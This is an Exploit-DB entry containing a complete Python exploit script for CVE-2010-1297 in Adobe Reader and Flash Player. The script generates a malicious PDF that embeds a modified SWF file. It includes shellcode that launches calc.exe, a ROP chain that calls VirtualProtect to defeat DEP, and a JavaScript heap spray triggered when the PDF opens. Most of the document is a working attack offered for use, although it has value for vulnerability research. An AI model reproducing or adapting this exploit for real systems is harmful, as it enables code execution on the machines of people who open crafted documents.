Adobe Acrobat Reader and Flash Player - 'newclass' Invalid Pointer

EDB-ID:

14853

CVE:

2010-1297

EDB Verified:

Author:

Abysssec

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

2010-09-01

Vulnerable App: 
'''
  __  __  ____         _    _ ____  
 |  \/  |/ __ \   /\  | |  | |  _ \ 
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ <    Day 1 (Binary Analysis)
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/ 

http://www.exploit-db.com/adobe-acrobat-newclass-invalid-pointer-vulnerability/
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14853.tar.gz (moaub1-adobe-newclass.tar.gz)

  Title             : Adobe Acrobat Reader and Flash Player “newclass” invalid pointer vulnerability
  Analysis          : http://www.abysssec.com
  Vendor            : http://www.adobe.com
  Impact            : Ciritical
  Contact           : shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter           : @abysssec
  CVE               : CVE-2010-1297
  MOAUB Number      : MOAUB-01-BA
'''

import sys

class PDF:
     
	def __init__(self):
		self.xrefs = []
		self.eol = '\x0a'
		self.content = ''
		self.xrefs_offset = 0
		
	def header(self):
		self.content += '%PDF-1.6' + self.eol
		
	def obj(self, obj_num, data,flag):
		self.xrefs.append(len(self.content))
		self.content += '%d 0 obj' % obj_num
		if flag == 1:
			self.content += self.eol + '<< ' + data + ' >>' + self.eol
		else:
			self.content += self.eol + data + self.eol
		self.content += 'endobj' + self.eol

	def obj_SWFStream(self, obj_num, data, stream):
		self.xrefs.append(len(self.content))
		self.content += '%d 0 obj' % obj_num
		self.content += self.eol + '<< ' + data + '/Params << /Size %d >> /DL %d /Length %d' %(len(stream),len(stream),len(stream))
		self.content += ' >>' + self.eol
		self.content += 'stream' + self.eol + stream + self.eol + 'endstream' + self.eol
		self.content += 'endobj' + self.eol
	
	def obj_Stream(self, obj_num, data, stream):
		self.xrefs.append(len(self.content))
		self.content += '%d 0 obj' % obj_num
		self.content += self.eol + '<< ' + data + '/Length %d' %len(stream)
		self.content += ' >>' + self.eol
		self.content += 'stream' + self.eol + stream + self.eol + 'endstream' + self.eol
		self.content += 'endobj' + self.eol
		
	def ref(self, ref_num):
		return '%d 0 R' % ref_num
		
	def xref(self):
		self.xrefs_offset = len(self.content)
		self.content += 'xref' + self.eol
		self.content += '0 %d' % (len(self.xrefs) + 1)
		self.content += self.eol
		self.content += '0000000000 65535 f' + self.eol
		for i in self.xrefs:
			self.content += '%010d 00000 n' % i
			self.content += self.eol
    
	def trailer(self):
		self.content += 'trailer' + self.eol
		self.content += '<< /Size %d' % (len(self.xrefs) + 1)
		self.content += ' /Root ' + self.ref(1) + ' >> ' + self.eol
		self.content += 'startxref' + self.eol
		self.content += '%d' % self.xrefs_offset
		self.content += self.eol
		self.content += '%%EOF'
		
	def generate(self):
		return self.content


		
		
class Exploit:
     
    def convert_to_utf16(self, payload):
        enc_payload = ''
        for i in range(0, len(payload), 2):
            num = 0
            for j in range(0, 2):
                num += (ord(payload[i + j]) & 0xff) << (j * 8)
            enc_payload += '%%u%04x' % num
        return enc_payload
             
    def get_payload(self):        	
        # shellcode calc.exe
        payload =("\x90\x90\x90\x89\xE5\xD9\xEE\xD9\x75\xF4\x5E\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
	          "\x43\x43\x43\x43\x43\x43\x37\x51\x5A\x6A\x41\x58\x50\x30\x41\x30\x41\x6B\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41"
		  "\x42\x58\x50\x38\x41\x42\x75\x4A\x49\x4B\x4C\x4B\x58\x51\x54\x43\x30\x43\x30\x45\x50\x4C\x4B\x51\x55\x47\x4C\x4C\x4B\x43\x4C"
		  "\x43\x35\x44\x38\x45\x51\x4A\x4F\x4C\x4B\x50\x4F\x44\x58\x4C\x4B\x51\x4F\x47\x50\x45\x51\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C"
		  "\x4B\x43\x31\x4A\x4E\x46\x51\x49\x50\x4A\x39\x4E\x4C\x4C\x44\x49\x50\x42\x54\x45\x57\x49\x51\x48\x4A\x44\x4D\x45\x51\x49\x52"
		  "\x4A\x4B\x4B\x44\x47\x4B\x46\x34\x46\x44\x45\x54\x43\x45\x4A\x45\x4C\x4B\x51\x4F\x47\x54\x43\x31\x4A\x4B\x43\x56\x4C\x4B\x44"
		  "\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C\x4C\x4B\x43\x31\x4A\x4B\x4C\x49\x51\x4C\x47\x54\x45\x54"
		  "\x48\x43\x51\x4F\x46\x51\x4C\x36\x43\x50\x46\x36\x45\x34\x4C\x4B\x50\x46\x50\x30\x4C\x4B\x47\x30\x44\x4C\x4C\x4B\x44\x30\x45"
		  "\x4C\x4E\x4D\x4C\x4B\x42\x48\x44\x48\x4D\x59\x4B\x48\x4B\x33\x49\x50\x43\x5A\x46\x30\x45\x38\x4C\x30\x4C\x4A\x45\x54\x51\x4F"
		  "\x42\x48\x4D\x48\x4B\x4E\x4D\x5A\x44\x4E\x50\x57\x4B\x4F\x4A\x47\x43\x53\x47\x4A\x51\x4C\x50\x57\x51\x59\x50\x4E\x50\x44\x50"
		  "\x4F\x46\x37\x50\x53\x51\x4C\x43\x43\x42\x59\x44\x33\x43\x44\x43\x55\x42\x4D\x50\x33\x50\x32\x51\x4C\x42\x43\x45\x31\x42\x4C"
		  "\x42\x43\x46\x4E\x45\x35\x44\x38\x42\x45\x43\x30\x41\x41")
        return payload


    def getSWF(self):
        try:
            #swfFile = sys.argv[2]
            fdR = open('flash.swf', 'rb+')
            strTotal = fdR.read()
            str1 = strTotal[:88]
            addr1 = '\x06\xa6\x17\x30'    #  addr = 0c0c0c0c			
            str2 = strTotal[92:533]
			#***************************   Bypass DEP by VirtualProtect   ********************************
            rop = ''
            rop += "\x77\xFA\x44\x7E"     # mov edi,esp   ret 4
            rop += "\x94\x28\xc2\x77"	  #add esp,20  pop ebp  ret
            rop += "AAAA"				  #padding
            rop += "\xD4\x1A\x80\x7C"     # VirtualProtect
            rop += "BBBB"			      # Ret Addr for VirtualProtect
            rop += "CCCC"			      # Param1	(lpAddress)
            rop += "DDDD"			      # Param2	(Size)
            rop += "EEEE"			      # Param3	(flNewProtect)
            rop += "\x10\xB0\xEF\x77"     # Param4    (Writable Address)
            rop += "AAAAAAAAAAAA"		  #padding
            rop += "\xC2\x4D\xC3\x77"	  #mov eax,edi   pop esi  ret
            rop += "AAAA"				  #padding
            rop += "\xF2\xE1\x12\x06"	  #add eax,94   ret
            rop += "\x70\xDC\xEE\x77"     #push esp   pop ebp   ret4
            rop += "\x16\x9A\x94\x7C"	  #mov [ebp-30],eax  ret
            rop += "AAAA"				  #padding
            rop += "\xC2\x4D\xC3\x77"     #mov eax,edi   pop esi  ret
            rop += "AAAA"				  #padding
            rop += "\xF2\xE1\x12\x06"	  #add eax,94   ret
            rop += "\x79\x9E\x83\x7C"	  #mov [ebp-2c],eax  ret
            rop += "\x27\x56\xEA\x77"	  #mov eax,6b3  ret
            rop += "\x14\x83\xE0\x77"	  #mov [ebp-28],eax  ret
            rop += "\xB4\x01\xF2\x77"	  #xor eax,eax  ret
            rop += "\x88\x41\x97\x7C"	  #add eax,40  pop ebp  ret
            rop += "AAAA"				  #padding
            rop += "\x70\xDC\xEE\x77"	  #push esp   pop ebp   ret4
            rop += "\xC0\x9E\xEF\x77"	  #mov [ebp-54],eax  ret
            rop += "AAAA"				  #padding
            rop += "\xC2\x4D\xC3\x77"	  #mov eax,edi   pop esi  ret
            rop += "AAAA"				  #padding
            rop += "\xC1\xF2\xC1\x77"	  #add eax,8 ret
            rop += "\xCF\x97\xDE\x77"	  #xchg eax,esp   ret
			
            str3 = strTotal[669:1249]
            alignESP = "\x83\xc4\x03"
            sc = self.get_payload()
			
            if len(sc) > 2118:
                print "[*] Error : payload length is long"
                return
            if len(sc) <= 2118:
                dif = 2118 - len(sc)
            while dif > 0 :
                sc += '\x90'
                dif = dif - 1
			
            str4 = strTotal[3370:3726]
			
            addr2 = '\xF2\x3D\x8D\x23'    #  Enter 0C75 , 81    RET	
			
            str5 = strTotal[3730:]
			
            fdW= open('exploit.swf', 'wb+')
            finalStr = str1+addr1+str2+rop+str3+alignESP+sc+str4+addr2+str5
            fdW.write(finalStr)	
           		
            #strTotal = open('exploit.swf', 'rb+').read()
            fdW.close()
            fdR.close()
            return finalStr
            
        except IOError:
            print '[*] Error : An IO error has occurred'
		
    def HeapSpray(self):
        spray = '''	
        function spray_heap()
        {
            var chunk_size, payload, nopsled;
             
            chunk_size = 0x1A0000;
            pointers = unescape("%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030");
            pointerSled = unescape("<Contents>");
            while (pointerSled.length < chunk_size)
                pointerSled += pointerSled;
            pointerSled_len = chunk_size - (pointers.length + 20);       
            pointerSled = pointerSled.substring(0, pointerSled_len);
            heap_chunks = new Array();
            for (var i = 0 ; i < <CHUNKS> ; i++)
                heap_chunks[i] = pointerSled + pointers;
        }            
        
         
        spray_heap();   
        '''
		
        spray = spray.replace('<Contents>', '%u33dd%u3030')   # Pointer to XCHG ESP , EBX
        '''
Authplay.dll
		
303033DD             ? 87DC                 XCHG ESP,EBX

#############################################################
					 will do nothing	

303033DF             ? 45                   INC EBP
303033E0             ? 05 00898784          ADD EAX,84878900 
303033E5             ? 42                   INC EDX
303033E6             ? 05 008987E8          ADD EAX,E8878900
303033EB             ? 41                   INC ECX
303033EC             ? 05 008987EC          ADD EAX,EC878900
303033F1             ? 41                   INC ECX
303033F2             ? 05 008987F0          ADD EAX,F0878900
303033F7             ? 41                   INC ECX
303033F8             ? 05 008987F4          ADD EAX,F4878900
303033FD             ? 41                   INC ECX
303033FE             ? 05 005F5E5D          ADD EAX,5D5E5F00
30303403             . B8 01000000          MOV EAX,1
30303408             . 5B                   POP EBX
############################################################

30303409             . 83C4 30              ADD ESP,30
3030340C             . C3                   RETN

        '''

        spray = spray.replace('<CHUNKS>', '40')   #Chunk count
        return spray
		
def generate_pdf():
	exploit = Exploit()
	swfFile = 'exploit.swf'
	pdf = PDF()
	pdf.header()
	pdf.obj(1, '/MarkInfo<</Marked true>>/Type /Catalog/Pages ' + pdf.ref(2) + ' /OpenAction ' + pdf.ref(17),1)
	#pdf.obj(1, '/MarkInfo<</Marked true>>/Type /Catalog/Pages ' + pdf.ref(2) ,1)
	pdf.obj(2, '/Count 1/Type/Pages/Kids[ '+pdf.ref(3)+' ]',1)
	pdf.obj(3, '/Annots [ '+pdf.ref(5) +' ]/Parent '+pdf.ref(2) + " /Type/Page"+' /Contents '+pdf.ref(4) ,1)
	pdf.obj_Stream(4, '','')
	pdf.obj(5, '/RichMediaSettings '+pdf.ref(6)+' /NM ( ' + swfFile + ' ) /Subtype /RichMedia /Type /Annot /RichMediaContent '+pdf.ref(7)+' /Rect [ 266 116 430 204 ]',1)
	pdf.obj(6, '/Subtype /Flash /Activation '+pdf.ref(8)+' /Type /RichMediaSettings /Deactivation '+pdf.ref(9),1)  
	pdf.obj(7, '/Type /RichMediaContent /Assets '+pdf.ref(10) +' /Configurations [ ' + pdf.ref(11) + ']',1)
	pdf.obj(8, '/Type /RichMediaActivation /Condition /PO ',1)	
	pdf.obj(9, '/Type /RichMediaDeactivation /Condition /XD ',1)	
	pdf.obj(10, '/Names [('+ swfFile +') ' + pdf.ref(12)+' ]',1)	
	pdf.obj(11, '/Subtype /Flash /Type /RichMediaConfiguration /Name (ElFlash) /Instances [ '+pdf.ref(13) +' ]',1)	
	pdf.obj(12, '/EF <</F '+pdf.ref(14) +' >> /Type /Filespec /F ('+ swfFile +')',1)	
	pdf.obj(13, '/Subype /Flash /Params '+pdf.ref(15) +' /Type /RichMediaInstance /Asset '+ pdf.ref(12) ,1)
	pdf.obj_SWFStream(14, ' /Type /EmbeddedFile  ',exploit.getSWF() )  
	pdf.obj(15, '/Binding /Background /Type /RichMediaParams /FlashVars () /Settings '+pdf.ref(16),1)
	pdf.obj_Stream(16, '<</Length 0 >> ','')  
	pdf.obj(17, '/Type /Action /S /JavaScript /JS (%s)' % exploit.HeapSpray(),1) 
	
	pdf.xref()
	pdf.trailer()
	return pdf.generate()
	
def main():
	if len(sys.argv) != 2:
		print 'Usage: python %s [output file name]' % sys.argv[0]
		sys.exit(0)
	file_name = sys.argv[1]
	if not file_name.endswith('.pdf'):
		file_name = file_name + '.pdf'
	try:
		fd = open(file_name, 'wb+')
		fd.write(generate_pdf())
		fd.close()
		print '[-] PDF file generated and written to %s' % file_name
	except IOError:
		print '[*] Error : An IO error has occurred'
		print '[-] Exiting ...'
		sys.exit(-1)
if __name__ == '__main__':
	main()
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services